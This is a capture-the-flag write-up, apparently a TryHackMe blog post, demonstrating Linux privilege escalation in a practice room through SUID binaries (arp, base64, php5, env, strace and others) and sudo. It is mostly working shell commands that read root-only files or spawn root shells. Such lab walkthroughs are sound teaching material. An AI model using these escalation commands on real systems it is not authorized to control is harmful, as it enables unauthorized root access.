Follow along with this writeup! https://tryhackme.com/room/privescplayground

Hello there, I'm Deskel. This is my first write-up on the THM blog.  Today, we are going to explore different ways we can escalate our privileges on a Linux Machine. The creator of the room, SherlockSec, mentioned there are tons of ways to privesc the machine and we're going to explore just a few of them.

Just a small tip, I refer to GTFObin a lot in this challenge. The site contains a list of shell-escaping commands. I break the write-up into two major sections, SUID and SUDO. Without further ado, let's get started!

Click on the link below and deploy the machine, so you can follow along!
https://tryhackme.com/room/privescplayground

Part 1: SUID

SUID exploitation is quite common in Linux especially when users misconfigure the important /bin and /sbin files.

If you want to know more about SUID exploitation, you can refer to this article. However, in short the SUID bit allows a user to run a binary using another users privileges. For example, the passwd binary (that changes your password), needs to run as root in order to make changes to the file system to update your password.

To quickly search on the SUID files on the system file, simply use the following command:

$ find / -perm /4000 2>/dev/null

The perm 4000 represents permission 4000 which is the SUID bit and we are going to ignore all 'permission denied' by using 2>/dev/null/ (sends any errors to a black hole /dev/null). Alternatively, you also can use mnemonic shortcuts.

$ find / -perm /u=s 2>/dev/null

List of SUID

There are tons of programs with the SUID bit to exploit. Always check with the GTFObins site and look for the possible SUID file exploitation. Here is the list of SUID that can be exploited.

For this instance, I'm going to show you the 12 SUID exploitation as a demo and you can figure out the rest using GTFObins. Feel free to deploy the machine on TryHackMe and practise yourself!

The demonstrations below show the process of getting a shell as the root user!

SUID 1: arp

Link: GTFObins-arp

$ /usr/sbin/arp -v -f /root/flag.txt

SUID: arp demo

SUID 2: cut

Link: GTFObins-cut

$ /usr/bin/cut -d "" -f1 /root/flag.txt

SUID: cut demo

SUID 3: Base64

Link: GTFObins-base64

$ /usr/bin/base64 /root/flag.txt | base64 --decode

SUID: base64 demo

SUID 4: tail

Link: GTFObins-tail

$ /usr/bin/tail /root/flag.txt

SUID: tail demo

SUID 5: ul

Link: GTFObins-ul

$ /usr/bin/ul /root/flag.txt

SUID: ul demo

SUID 6: shuf

Link: GTFObins-shuf

Instead of reading the flag file like the previous SUID, shuf is used to  overwrite the file. This SUID command is quite useful to rewrite the  configuration file which cannot be done by lower privileged users.

SUID 7: php5

Link: GTFObins-php

$ /usr/bin/php5 -r "pcntl_exec('/bin/sh');"

SUID: php5 demo

SUID 8: file

Link: GTFObins-file

$ /usr/bin/file -m /root/flag.txt

SUID: file demo

SUID 9: tclsh

Link: GTFObins-tclsh8.5

$ /usr/bin/tclsh8.5
% exec cat /root/flag.txt

SUID: tclsh demo

SUID 10: env

Link: GTFObins-env

$ /usr/bin/env /bin/sh

SUID: env demo

SUID 11: diff

Link: GTFObins-diff

$ /usr/bin/diff --line-format=%L /dev/null /root/flag.txt

SUID: diff demo

SUID 12: strace

Link: GTFObins-strace

$ /usr/bin/strace -o /dev/null /bin/sh

SUID strace demo

Part 2: Sudo

Another privilege escalation method is seeing what commands you can run as root (administrators often allow users to run certain commands as root). Just small tips here, always check with the ./etc/sudoers file or visudo command to what permissions you've been given.

To check what commands you can run as root, simply punch in the following line.

$ sudo -l

All sudo permission for lower privilege user

The screenshot above shows you all the commands you can run as the root user, without being asked for a password. We can see this from the (root) NOPASSWD, followed by the binaries we can run..

Actually it is rare to see this kind of stuff in real life. The lower  privilege user literally can run anything as sudo. Similarly, you can  check the GTFObins for sudo shell-escape.

$ sudo /bin/bash

Privilege escalate using /bin/bash

Summary

That's all for the quick write-up for the privesc playground. GTFObins is definitely a useful site to check with the privilege escalation in terms of SUID and SUDO. One more thing, check out mzfr's GTFObins tool, he did a great job on beautifying the tool via terminal.

Hope you enjoyed reading and learnt something new! Until next time :)